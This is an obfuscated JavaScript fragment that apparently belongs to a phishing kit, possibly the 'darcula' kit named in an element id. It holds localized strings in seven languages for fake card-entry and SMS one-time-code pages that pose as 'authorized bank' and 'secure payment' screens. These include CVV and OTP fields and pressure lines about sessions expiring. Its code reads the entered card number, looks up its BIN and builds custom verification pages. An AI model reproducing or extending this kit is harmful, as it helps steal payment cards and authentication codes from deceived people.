    'cardDenyCreditMsg': "Bu amal üçin kredit kartoçkalary kabul edilmeýär",
    'cardDenyDebitMsg': "Bu amal debet kartlaryny kabul etmeýär",
    'title': "Ygtyýarly bank",
    'subTitle': "Ygtyýarnamany tassyklamak üçin bank programmasyna girmegiňizi haýyş edýäris",
    'hint': "Bu sahypany ýapmaň",
    'rejectMsg': "Sessiýa gutarýar, barlagy häzir tamamlaň",
    'smsTitle': "Ygtybarly töleg",
    'smsPhone': "Barlag kody *** iberildi",
    'smsOnetime': "Şahsyýetiňizi tassyklaň we mobil belgiňize ýa-da e-poçta salgyňyza bir gezeklik kod iberiler, tassyklama koduny şu ýere giriziň",
    'smsSubtitle': "\"Täzelen\" ýa-da \"Yzyna\" düwmelerine basmagyňyzy haýyş edýäris, sebäbi bu amalyňyzy ýatyryp ýa-da ýatyryp biler",
    'rejectSms': "Barlamak kody ýalňyşlygy, gaýtadan synanyşmagyňyzy haýyş edýäris",
    'smsCode': "Barlag kody",
    'smsSubmit': "Iberiň",
    'smsResend': "Başga kod almak üçin şu ýere basyň"
  },
  'km': {
    'cardName': "អ្នកកាន់ប័ណ្ណ",
    'cardNumber': 'លេខកាត',
    'cardExpire': "កាលបរិច្ឆេទផុតកំណត់",
    'cardCvv': "លេខកូដសុវត្ថិភាព (CVV)",
    'cardSubmit': 'ដាក់ស្នើ',
    'cardErrorMsg': "កាតនេះមិនគាំទ្រប្រតិបត្តិការនេះទេ សូមសាកល្បងកាតផ្សេងទៀត។",
    'cardDenyCreditMsg': "ប័ណ្ណឥណទានមិនត្រូវបានទទួលយកសម្រាប់ប្រតិបត្តិការនេះទេ។",
    'cardDenyDebitMsg': "ប្រតិបត្តិការនេះមិនទទួលយកប័ណ្ណឥណពន្ធទេ។",
    'title': "ធនាគារដែលមានការអនុញ្ញាត",
    'subTitle': "សូមចូលទៅកាន់កម្មវិធីធនាគារ ដើម្បីបញ្ជាក់ការអនុញ្ញាត",
    'hint': "សូមកុំបិទទំព័រនេះ។",
    'rejectMsg': "វគ្គនេះហៀបនឹងផុតកំណត់ សូមបញ្ចប់ការផ្ទៀងផ្ទាត់ឥឡូវនេះ",
    'smsTitle': "ការទូទាត់ប្រកបដោយសុវត្ថិភាព",
    'smsPhone': "លេខកូដផ្ទៀងផ្ទាត់ត្រូវបានផ្ញើទៅ ***",
    'smsOnetime': "សូមបញ្ជាក់អត្តសញ្ញាណរបស់អ្នក ហើយលេខកូដដែលមានតែមួយដងនឹងត្រូវបានផ្ញើទៅកាន់លេខទូរស័ព្ទ ឬអាសយដ្ឋានអ៊ីមែលរបស់អ្នក។ សូមបញ្ចូលលេខកូដផ្ទៀងផ្ទាត់នៅទីនេះ",
    'smsSubtitle': "សូមកុំចុចប៊ូតុង \"ធ្វើឱ្យស្រស់\" ឬ \"ថយក្រោយ\" ព្រោះវាអាចនឹងបញ្ចប់ ឬបញ្ចប់ប្រតិបត្តិការរបស់អ្នក",
    'rejectSms': "កំហុសលេខកូដផ្ទៀងផ្ទាត់ សូមព្យាយាមម្តងទៀត",
    'smsCode': "កូដផ្ទៀងផ្ទាត់",
    'smsSubmit': "ដាក់ស្នើ",
    'smsResend': "ចុចទីនេះដើម្បីទទួលបានលេខកូដផ្សេងទៀត។"
  },
  'sq': {
    'cardName': "Mbajtësi i kartës",
    'cardNumber': "Numri i kartes",
    'cardExpire': "Data e skadimit",
    'cardCvv': "Kodi i Sigurisë (CVV)",
    'cardSubmit': "Paraqisni",
    'cardErrorMsg': "Kjo kartë nuk e mbështet këtë transaksion, ju lutemi provoni një kartë tjetër",
    'cardDenyCreditMsg': "Kartat e kreditit nuk pranohen për këtë transaksion",
    'cardDenyDebitMsg': "Ky transaksion nuk pranon karta debiti",
    'title': "Bankë e autorizuar",
    'subTitle': "Ju lutemi shkoni te aplikacioni i bankës për të konfirmuar autorizimin",
    'hint': "Ju lutemi mos e mbyllni këtë faqe",
    'rejectMsg': "Seanca është gati të skadojë, ju lutemi plotësoni verifikimin tani",
    'smsTitle': "Pagesë e sigurt",
    'smsPhone': "Kodi i verifikimit është dërguar në ***",
    'smsOnetime': "Ju lutemi konfirmoni identitetin tuaj dhe një kod një herë do të dërgohet në numrin tuaj celular ose adresën e emailit. Ju lutemi shkruani kodin e verifikimit këtu",
    'smsSubtitle': "Ju lutemi mos klikoni butonat \"Rifresko\" ose \"Kthehu\" pasi kjo mund të përfundojë ose të përfundojë transaksionin tuaj",
    'rejectSms': "Gabim kodi verifikimi, ju lutemi provoni përsëri",
    'smsCode': "Kodi i Verifikimit",
    'smsSubmit': "Paraqisni",
    'smsResend': "Klikoni këtu për të marrë një kod tjetër"
  },
  'uk': {
    'cardName': "Власник картки",
    'cardNumber': "Номер картки",
    'cardExpire': "Дата закінчення терміну",
    'cardCvv': "Код безпеки (CVV)",
    'cardSubmit': "Надіслати",
    'cardErrorMsg': "Ця картка не підтримує цю транзакцію, спробуйте іншу картку",
    'cardDenyCreditMsg': "Для цієї операції кредитні картки не приймаються",
    'cardDenyDebitMsg': "Ця транзакція не приймає дебетові картки",
    'title': "Уповноважений банк",
    'subTitle': "Перейдіть у додаток банку, щоб підтвердити авторизацію",
    'hint': "Будь ласка, не закривайте цю сторінку",
    'rejectMsg': "Сесія незабаром завершиться, завершіть перевірку зараз",
    'smsTitle': "Безпечна оплата",
    'smsPhone': "Код підтвердження надіслано на ***",
    'smsOnetime': "Підтвердьте свою особу, і на ваш номер мобільного телефону або електронну адресу буде надіслано одноразовий код. Введіть код підтвердження тут",
    'smsSubtitle': "Будь ласка, не натискайте кнопки «Оновити» або «Назад», оскільки це може припинити або припинити вашу транзакцію",
    'rejectSms': "Помилка коду підтвердження, спробуйте ще раз",
    'smsCode': "Код підтвердження",
    'smsSubmit': "Надіслати",
    'smsResend': "Натисніть тут, щоб отримати інший код"
  },
  'mn': {
    'cardName': "Карт эзэмшигч",
    'cardNumber': "Картны дугаар",
    'cardExpire': "Хугацаа дуусах огноо",
    'cardCvv': "Аюулгүй байдлын код (CVV)",
    'cardSubmit': "Илгээх",
    'cardErrorMsg': "Энэ карт энэ гүйлгээг дэмждэггүй тул өөр картаар оролдоно уу",
    'cardDenyCreditMsg': "Энэ гүйлгээнд зээлийн картыг хүлээн авахгүй",
    'cardDenyDebitMsg': "Энэ гүйлгээ нь дебит картыг хүлээн авахгүй",
    'title': "Эрх бүхий банк",
    'subTitle': "Зөвшөөрлийг баталгаажуулахын тулд банкны апп руу очно уу",
    'hint': "Энэ хуудсыг хааж болохгүй",
    'rejectMsg': "Сеанс дуусах гэж байна, одоо баталгаажуулалтыг гүйцээнэ үү",
    'smsTitle': "Аюулгүй төлбөр",
    'smsPhone': "Баталгаажуулах кодыг *** руу илгээсэн.",
    'smsOnetime': "Таны хувийн мэдээллийг баталгаажуулна уу, таны гар утасны дугаар эсвэл имэйл хаяг руу нэг удаагийн код илгээгдэх болно. Баталгаажуулах кодыг энд оруулна уу",
    'smsSubtitle': "Энэ нь таны гүйлгээг дуусгавар болгох эсвэл дуусгавар болгож болзошгүй тул \"Сэргээх\" эсвэл \"Буцах\" товчийг дарж болохгүй",
    'rejectSms': "Баталгаажуулах кодын алдаа, дахин оролдоно уу",
    'smsCode': "Баталгаажуулах код",
    'smsSubmit': 'Илгээх',
    'smsResend': "Энд дарж өөр код хүлээн авна уу"
  },
  'fa': {
    'cardName': "دارنده کارت",
    'cardNumber': "شماره کارت",
    'cardExpire': "تاریخ انقضا",
    'cardCvv': "کد امنیتی (CVV)",
    'cardSubmit': "ارسال",
    'cardErrorMsg': "این کارت از این تراکنش پشتیبانی نمی‌کند، لطفاً کارت دیگری را امتحان کنید",
    'cardDenyCreditMsg': "کارت های اعتباری برای این تراکنش پذیرفته نمی شوند",
    'cardDenyDebitMsg': "کارت های نقدی برای این تراکنش پذیرفته نمی شوند",
    'title': "بانک مجاز",
    'subTitle': "لطفاً برای تأیید مجوز به برنامه بانک بروید",
    'hint': "لطفا این صفحه را نبندید",
    'rejectMsg': "جلسه رو به اتمام است، لطفاً اکنون تأیید را تکمیل کنید",
    'smsTitle': "پرداخت مطمئن",
    'smsPhone': "کد تایید به *** ارسال شد",
    'smsOnetime': "لطفا هویت خود را تایید کنید و یک کد یکبار مصرف به شماره موبایل یا آدرس ایمیل شما ارسال خواهد شد. لطفاً کد تأیید را در اینجا وارد کنید",
    'smsSubtitle': "لطفاً روی دکمه‌های «Refresh» یا «Back» کلیک نکنید زیرا ممکن است تراکنش شما را لغو یا خاتمه دهد.",
    'rejectSms': "خطای کد تأیید، لطفاً دوباره امتحان کنید",
    'smsCode': "کد تایید",
    'smsSubmit': "ارسال",
    'smsResend': "برای دریافت کد دیگر اینجا را کلیک کنید"
  },
  'sw': {
    'cardName': "mwenye kadi",
    'cardNumber': "namba ya kadi",
    'cardExpire': "Tarehe ya kuisha muda wake",
    'cardCvv': "Nambari ya usalama (CVV)",
    'cardSubmit': "wasilisha",
    'cardErrorMsg': "Kadi hii haitumii muamala huu, tafadhali jaribu kadi nyingine",
    'cardDenyCreditMsg': "Kadi za mkopo hazikubaliwi kwa muamala huu",
    'cardDenyDebitMsg': "Kadi za malipo hazikubaliwi kwa muamala huu",
    'title': "benki iliyoidhinishwa",
    'subTitle': "Tafadhali nenda kwa Programu ya benki ili uthibitishe uidhinishaji",
    'hint': "Tafadhali usifunge ukurasa huu",
    'rejectMsg': "Kipindi kinakaribia kuisha, tafadhali kamilisha uthibitishaji sasa",
    'smsTitle': "Malipo salama",
    'smsPhone': "Nambari ya kuthibitisha imetumwa kwa ***",
    'smsOnetime': "Tafadhali thibitisha utambulisho wako na msimbo wa mara moja utatumwa kwa nambari yako ya simu au barua pepe. Tafadhali weka msimbo wa uthibitishaji hapa",
    'smsSubtitle': "Tafadhali usibofye vitufe vya \"Onyesha upya\" au \"Nyuma\" kwani hii inaweza kuharibu au kusitisha muamala wako.",
    'rejectSms': "Hitilafu ya msimbo wa uthibitishaji, tafadhali jaribu tena",
    'smsCode': "Nambari ya uthibitishaji",
    'smsSubmit': 'wasilisha',
    'smsResend': "Bofya hapa ili kupokea msimbo mwingine"
  }
};
const N = _0x1e85f9 => _0x405264 => {
  var _0x79ccd2;
  return ((_0x79ccd2 = l[_0x1e85f9]) == null ? undefined : _0x79ccd2[_0x405264]) || l.en[_0x405264];
};
const x = () => {
  var _0x269138;
  var _0x422f47;
  var _0x25bfab;
  var _0x46f368;
  const _0x51d6e9 = JSON.parse(a37_0x2338d7("verify-page") || '[]');
  if (_0x51d6e9 instanceof Array) {
    const _0x3da43a = [];
    let _0x3ac4f6 = 0x0;
    for (const _0x3866c6 of _0x51d6e9) {
      if (_0x3866c6["page-title"]) {
        _0x3da43a.push({
          'key': "accept-custom-verify-" + _0x3ac4f6,
          'label': "自定义" + (_0x3ac4f6 + 0x1) + ": " + _0x3866c6['page-title'],
          'data': (_0x422f47 = (_0x269138 = _0x3866c6["page-text"]) == null ? undefined : _0x269138.match(/\$\{(.*?)\}/g)) == null ? undefined : _0x422f47.map(_0x35d45d => _0x35d45d.replace(/^\$\{/, '').replace(/\}$/, '').split('|')[0x0].trim()).join(" | ")
        });
      }
      _0x3ac4f6++;
    }
    return _0x3da43a;
  } else {
    if (_0x51d6e9['page-title']) {
      return [{
        'key': "accept-custom-verify-0",
        'label': "自定义: " + _0x51d6e9["page-title"],
        'data': (_0x46f368 = (_0x25bfab = _0x51d6e9['page-text']) == null ? undefined : _0x25bfab.match(/\$\{(.*?)\}/g)) == null ? undefined : _0x46f368.map(_0x3677c7 => _0x3677c7.replace(/^\$\{/, '').replace(/\}$/, '').split('|')[0x0].trim()).join(" | ")
      }];
    }
  }
  return [];
};
const O = () => {
  var _0x13a490;
  const _0x28c9c8 = a37_0x53a1fc();
  const _0x2fceb5 = a37_0x45aeb0();
  const _0x48a11e = String(((_0x13a490 = _0x2fceb5.data) == null ? undefined : _0x13a490.data.cardNumber) || '').replace(/\D/g, '');
  const _0x5837db = a37_0x788a3a();
  const _0x34091c = a37_0xe2567c(() => {
    var _0x52ba48;
    return ((_0x52ba48 = _0x5837db.value) == null ? undefined : _0x52ba48.schema) || '';
  });
  const _0x3efda2 = a37_0xe2567c(() => _0x28c9c8.query.accept);
  const _0x422ea = a37_0xe2567c(() => _0x28c9c8.query.back);
  const _0x35e1ff = N(String(_0x28c9c8.query.lang) || navigator.language.split('-')[0x0]);
  a37_0x54a45a(async () => {
    const _0x2fa713 = await a37_0x1515c7(_0x48a11e.substring(0x0, 0x6));
    _0x5837db.value = _0x2fa713 || {};
  });
  const _0x576e62 = document.createElement("div");
  _0x576e62.id = "darcula-teleport-page";
  document.body.prepend(_0x576e62);
  a37_0x42606d(() => {
    _0x576e62.remove();
  });
  return {
    'cardNumber': _0x48a11e,
    'bin': _0x5837db,
    'cardType': _0x34091c,
    'acceptPage': _0x3efda2,
    'backPage': _0x422ea,
    'lang': _0x35e1ff
  };
};
export { x as a, N as g, w as i, O as u };